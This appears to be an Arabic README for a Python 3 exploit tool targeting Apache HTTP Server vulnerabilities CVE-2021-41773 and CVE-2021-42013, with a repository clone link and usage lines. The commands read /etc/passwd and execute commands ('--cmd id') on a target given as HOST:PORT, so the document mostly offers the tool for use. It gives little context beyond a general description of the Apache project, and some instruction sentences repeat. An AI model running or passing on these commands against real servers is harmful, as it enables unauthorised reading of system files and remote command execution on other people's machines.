
تم إنشاء استغلال بلغة python3 لاستغلال الثغرات المعروفة في خادم ويب Apache (CVE-2021-41773, CVE-2021-42013)
أداة استغلال تم إنشاؤها بلغة بايثون 3 لاستغلال الثغرات المعروفة في خادم أباتشي (CVE-2021-41773, CVE-2021-42013)
مشروع خادم HTTP لأباتشي هو جهد لتطوير وصيانة خادم HTTP مفتوح المصدر لأنظمة التشغيل الحديثة بما في ذلك UNIX و Windows. الهدف من هذا المشروع هو توفير خادم آمن وفعال وقابل للتوسعة يقدم خدمات HTTP بما يتوافق مع معايير HTTP الحالية.
قم فقط بعمل clone للمستودع:
git clone https://github.com/0xGabe/Apache-CVEs
لقراءة الملف المطلوب، قم بتمرير مسار الملف فقط، إذا لم يكن لدى المستخدم صلاحية القراءة، فلن تكون هناك نتيجة للقراءة.
python3 cve-2021-41773.py --url http://HOST:PORT --path /etc/passwd
لتنفيذ الأوامر التي تحتوي على مسافات أو أحرف خاصة أو ما شابه ذلك على الجهاز الهدف، من الضروري وضع الأمر بين علامتي اقتباس.
python3 cve-2021-41773.py --url http://HOST:PORT --cmd id
لقراءة الملف المطلوب، قم بتمرير مسار الملف فقط، إذا لم يكن لدى المستخدم صلاحية القراءة، فلن تكون هناك نتيجة للقراءة.
python3 cve-2021-42013.py --url http://HOST:PORT --path /etc/passwd
لتنفيذ الأوامر التي تحتوي على مسافات أو أحرف خاصة أو ما شابه ذلك على الجهاز الهدف، من الضروري وضع الأمر بين علامتي اقتباس.
python3 cve-2021-42013.py --url http://HOST:PORT --cmd id